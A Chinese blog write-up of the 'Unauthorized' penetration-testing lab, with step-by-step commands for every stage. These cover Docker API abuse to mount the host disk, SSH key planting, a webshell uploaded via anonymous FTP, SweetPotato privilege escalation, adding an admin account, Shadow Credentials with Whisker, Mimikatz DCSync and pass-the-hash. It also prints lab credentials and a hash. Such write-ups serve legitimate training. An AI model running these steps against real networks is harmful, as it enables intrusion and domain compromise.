春秋云镜-【仿真场景】Unauthorized writeup

野性酷女 2024-03-26 18:55 48阅读 0赞

### 说明 ###

Unauthorized是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag，分布于不同的靶机。

### 技术 ###

FTP、Privilege Elevation、AD CS、Kerberos、域渗透

### 第一个flag ###

#### docker 未授权 ####

通过外网信息收集，发现docker未授权

[https://cloud.tencent.com/developer/article/1744943][https_cloud.tencent.com_developer_article_1744943]

![f80e0d67e6483be997d30002803294cc.png][]

查看镜像

docker -H tcp://47.92.7.138:2375 images

![337c8b33fa798246256f371fdad2c7c6.png][]

查看容器

docker -H tcp://47.92.7.138:2375 ps -a

![d4fe363e8e52be8239ac723e051405d2.png][]

启动容器并将宿主机磁盘挂载到/mnt

docker -H tcp://47.92.7.138:2375 run -it -v /:/mnt --entrypoint /bin/bash ubuntu:18.04

![d943930946c45dbcd226fc5c8dd95271.png][]

#### 写入公钥 ####

在vps上生成秘钥，敲下回车后会有3个交互，第一个是文件名，默认是id\_rsa，如需修改，自己输入一个文件名便可。第二与第三是密码与确认密码，是以后使用该公钥时要输入的密码，一般不设置，如有强烈的安全需求，自己设置便可。最后会生成两个文件id\_rsa，id\_rsa.pub。以.pub结尾的是公钥，另一个是私钥

ssh-keygen -t rsa

![be0f399533edb30d57a6e351ca7439a8.png][]

将公钥其写入到目标机器宿主机的/root/.ssh/authorized\_keys文件中

cd /mnt/root/.ssh/
    echo "ssh-rsa AAAAB3NzaC1yc2......." > authorized_keys

![e3d23ac3ade4a775664f3140d7eadbcb.png][]

可以本地直接用私钥登录ssh

![3106d6ccc083fdeeabd438780acd23cf.png][]

查找flag，提示flag并不在这里

![55f6296591c34fabcbfd9f424aa2cef3.png][]

#### mysql弱口令 ####

查看本机开放的端口

netstat -aptn

![3e4120ebea22b9947d7dc30aebfe2b3d.png][]

查看历史命令，找到mysql密码为123456，其实爆破也能爆破出来

history

![779629b240840e5dcbcbd29f4d03a231.png][]

访问mysql数据库

mysql -uroot -p123456
    
    mysql> show databases;
    mysql> use secret;
    mysql> show tables;
    mysql> select * from f1agggg01

获得第一个flag

![16d8d343b7c3d47490873e0ea38cef0d.png][]

### 第二个flag ###

#### 横向渗透 ####

上传npc设置代理，fscan扫描 172.22.7.0/24

172.22.7.67:8081 open
    172.22.7.13:80 open
    172.22.7.13:22 open
    172.22.7.67:445 open
    172.22.7.31:445 open
    172.22.7.67:21 open
    172.22.7.6:445 open
    172.22.7.67:80 open
    172.22.7.67:139 open
    172.22.7.31:139 open
    172.22.7.6:139 open
    172.22.7.31:135 open
    172.22.7.67:135 open
    172.22.7.6:135 open
    172.22.7.6:88 open
    172.22.7.13:2375 open
    [+] NetInfo:
    [*]172.22.7.6
       [->]DC02
       [->]172.22.7.6
    [*] 172.22.7.67          XIAORANG\WIN-9BMCSG0S  
    [*] WebTitle:http://172.22.7.13        code:200 len:27170  title:某某装饰
    [+] NetInfo:
    [*]172.22.7.67
       [->]WIN-9BMCSG0S
       [->]172.22.7.67
    [+] NetInfo:
    [*]172.22.7.31
       [->]ADCS
       [->]172.22.7.31
    [*] 172.22.7.31          XIAORANG\ADCS          
    [*] 172.22.7.6     [+]DC XIAORANG\DC02          
    [*] WebTitle:http://172.22.7.13:2375   code:404 len:29     title:None
    [+] ftp://172.22.7.67:21:anonymous 
       [->]1-1P3201024310-L.zip
       [->]1-1P320102603C1.zip
       [->]1-1P320102609447.zip
       [->]1-1P320102615Q3.zip
       [->]1-1P320102621J7.zip
       [->]1-1P320102J30-L.zip
    [*] WebTitle:http://172.22.7.67        code:200 len:703    title:IIS Windows Server
    [*] WebTitle:http://172.22.7.67:8081   code:200 len:4621   title:公司管理后台
    [+] http://172.22.7.13:2375 poc-yaml-docker-api-unauthorized-rce 
    [+] http://172.22.7.67:8081/www.zip poc-yaml-backup-file
    [+] http://172.22.7.13:2375 poc-yaml-go-pprof-leak

#### FTP未授权 ####

发现了[http://172.22.7.67:8081/www.zip][http_172.22.7.67_8081_www.zip] 备份压缩包 ，解压后发现download的文件夹与匿名登录的ftp的共享文件一致

![7a4c11fbd41c7c1aff2643790f636469.png][]

因此可以通过ftp上传 webshell

![4eadfa1bb9bfbf56a7b3b9c70c9bd55b.png][]

shell地址

http://172.22.7.67:8081/download/shell.asp

![8d9b19b3b60ac4ec6d0496f1bb516186.png][]

直接使用土豆提权，上传SweetPotato.exe

SweetPotato.exe -a "whoami"

![54f61c16ca4f61938c7967065a0ddf92.png][]

经测试3389是开启的，直接添加账号然后登录

SweetPotato.exe -a "net user devyn Admin@123 /add"
    SweetPotato.exe -a "net localgroup administrators devyn /add"

![a08a550abd896bdd60c586a7dc4dd68d.png][]

获取flag

![ce24a92e34b04562888a92d92019874d.png][]

### 第三个flag ###

注意此新建的用户无法执行域命令，所以需要查询到域账号，然后使用PTH登录，如果找到密码可以直接登录，其实也可以直接在shell中执行mimikatz抓取Hash，这边远程桌面使用cmd执行方便一点

抓取到了域账户 zhangfeng/FenzGTaVF6En，重新使用域账号登录，注意用户名要填写 zhangfeng@xiaorang.lab

![74dca5b4b1d5d3d0ac0666fc2dc6b72a.png][]

#### shadow-credentials ####

[https://wiki.whoamianony.top/active-directory-methodology/shadow-credentials][https_wiki.whoamianony.top_active-directory-methodology_shadow-credentials]

以下账户拥有 msDS-KeyCredentialLink 属性的写入权限：

*  域管理员账户
 *  Key Admins 组中的账户
 *  Enterprise Key Admins 组中的账户
 *  对 Active Directory 中的对象具有 GenericAll 或 GenericWrite 权限的帐户
 *  机器账户对自身的 msDS-KeyCredentialLink 属性拥有写入权限

zhangfeng账户在Key Admins组中，具有写入权限

![a3484aeaf262e5bcae577937d30e9fa5.png][]

向域控制器的 msDS-KeyCredentialLink 属性添加 Shadow Credentials

Whisker.exe add /target:DC02$ /domain:xiaorang.lab /dc:DC02.xiaorang.lab

![a5cc3f989b4ae5c0b6962d8fea7952bc.png][]

添加成功后，程序提示命令，基于证书的身份验证请求TGT票据，注意提示命令的最后加上 /ptt

![c5a8c87f1ce24f2339c830dfdcf2fc16.png][]

域控制器账户拥有特权，可以使用 Mimikatz 执行 DCSync 来导出域管哈希

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit

![9475a3695471bc8961ce342242513ac1.png][]

#### 哈希传递 ####

proxychains python3 wmiexec.py -hashes 00000000000000000000000000000000:bf967c5a0f7256e2eaba589fbd29a382 Administrator@172.22.7.6

![f531d57b2e0d6322613e34fd295b982b.png][]

![0b5fe1f03c6998615e48fc23706a6865.png][]

原文链接： [https://zhuanlan.zhihu.com/p/581451146][https_zhuanlan.zhihu.com_p_581451146]

[https_cloud.tencent.com_developer_article_1744943]: https://link.zhihu.com/?target=https%3A//cloud.tencent.com/developer/article/1744943
[f80e0d67e6483be997d30002803294cc.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/f6f9b8cb972d4dff880c3e9d1db72921.png
[337c8b33fa798246256f371fdad2c7c6.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/657f8ea0278e4ae482fcd35038866f80.png
[d4fe363e8e52be8239ac723e051405d2.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/1450628f5fd64f78ba4987d3e613d13d.png
[d943930946c45dbcd226fc5c8dd95271.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/39450005c98842a583f36b1278c4cda6.png
[be0f399533edb30d57a6e351ca7439a8.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/3b691e559efe4b7a9ac1a2d724a7b5f4.png
[e3d23ac3ade4a775664f3140d7eadbcb.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/632d859657e44439b1ee70177bbbd8d3.png
[3106d6ccc083fdeeabd438780acd23cf.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/5c50f7de3935475ea43ce9fcf6eccfbe.png
[55f6296591c34fabcbfd9f424aa2cef3.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/24b112bb40e440069814419482856c12.png
[3e4120ebea22b9947d7dc30aebfe2b3d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/1935dcba5420413098e2293587b639aa.png
[779629b240840e5dcbcbd29f4d03a231.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/de06f0adcf894ea9aec639a728f33428.png
[16d8d343b7c3d47490873e0ea38cef0d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/c451b859b1324fdd9786a38cc7a0d838.png
[http_172.22.7.67_8081_www.zip]: https://link.zhihu.com/?target=http%3A//172.22.7.67%3A8081/www.zip
[7a4c11fbd41c7c1aff2643790f636469.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/4bed3fde16f64d499581f67898ca143b.png
[4eadfa1bb9bfbf56a7b3b9c70c9bd55b.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/7f2e38ce0b7047e9ae95042e0fe60dd9.png
[8d9b19b3b60ac4ec6d0496f1bb516186.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/4172b08763bc4002900dd82a72659208.png
[54f61c16ca4f61938c7967065a0ddf92.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/ba1a783202bb4af7b0fc42d6f7bc5c28.png
[a08a550abd896bdd60c586a7dc4dd68d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/8d5d0acf74814db3b8cece61b3092660.png
[ce24a92e34b04562888a92d92019874d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/04165ad8a2724811b615b506de8cb5d1.png
[74dca5b4b1d5d3d0ac0666fc2dc6b72a.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/c10eb966cca34f30a5cc69c4d22767e8.png
[https_wiki.whoamianony.top_active-directory-methodology_shadow-credentials]: https://link.zhihu.com/?target=https%3A//wiki.whoamianony.top/active-directory-methodology/shadow-credentials
[a3484aeaf262e5bcae577937d30e9fa5.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/2a510223c6ea415099bfb791ef16d6ad.png
[a5cc3f989b4ae5c0b6962d8fea7952bc.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/bb0b65663b604e109a70f4557a9d427d.png
[c5a8c87f1ce24f2339c830dfdcf2fc16.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/ae71a3eb47294643a6b04e32c36e5a24.png
[9475a3695471bc8961ce342242513ac1.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/26ac1097c6fb496ab42c2ddf00df4f0d.png
[f531d57b2e0d6322613e34fd295b982b.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/51cb6ab2a4dd42b9887ddd0310179ef1.png
[0b5fe1f03c6998615e48fc23706a6865.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/885151e69a29402ebaa808d73285b56c.png
[https_zhuanlan.zhihu.com_p_581451146]: https://zhuanlan.zhihu.com/p/581451146